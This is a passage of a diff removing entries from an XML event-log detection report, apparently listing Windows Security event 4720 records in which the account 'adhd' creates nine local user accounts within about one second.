-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.0395835Z'/&gt;&lt;EventRecordID&gt;4177&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Nicholas&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1022&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Nicholas&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Nicholas</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4171</recordid>
-            <time>2020-06-11 22:04:52.954875300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.9548753Z'/&gt;&lt;EventRecordID&gt;4171&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jennifer&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1021&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jennifer&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jennifer</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4165</recordid>
-            <time>2020-06-11 22:04:52.871498100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.8714981Z'/&gt;&lt;EventRecordID&gt;4165&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Deborah&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1020&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Deborah&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Deborah</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4159</recordid>
-            <time>2020-06-11 22:04:52.780970200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.7809702Z'/&gt;&lt;EventRecordID&gt;4159&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Amber&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1019&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Amber&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Amber</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4153</recordid>
-            <time>2020-06-11 22:04:52.686020600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.6860206Z'/&gt;&lt;EventRecordID&gt;4153&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Nancy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1018&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Nancy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Nancy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4147</recordid>
-            <time>2020-06-11 22:04:52.611615100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.6116151Z'/&gt;&lt;EventRecordID&gt;4147&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Samantha&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1017&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Samantha&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Samantha</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4141</recordid>
-            <time>2020-06-11 22:04:52.521030500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.5210305Z'/&gt;&lt;EventRecordID&gt;4141&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kimberly&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1016&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kimberly&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kimberly</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4135</recordid>
-            <time>2020-06-11 22:04:52.439829100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.4398291Z'/&gt;&lt;EventRecordID&gt;4135&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Amy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1015&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Amy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Amy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4129</recordid>
-            <time>2020-06-11 22:04:52.334204600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.3342046Z'/&gt;&lt;EventRecordID&gt;4129&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Victoria&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1014&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Victoria&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Victoria</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4123</recordid>
-            <time>2020-06-11 22:04:52.231553300Z</time>
-            <channel>Security</channel>
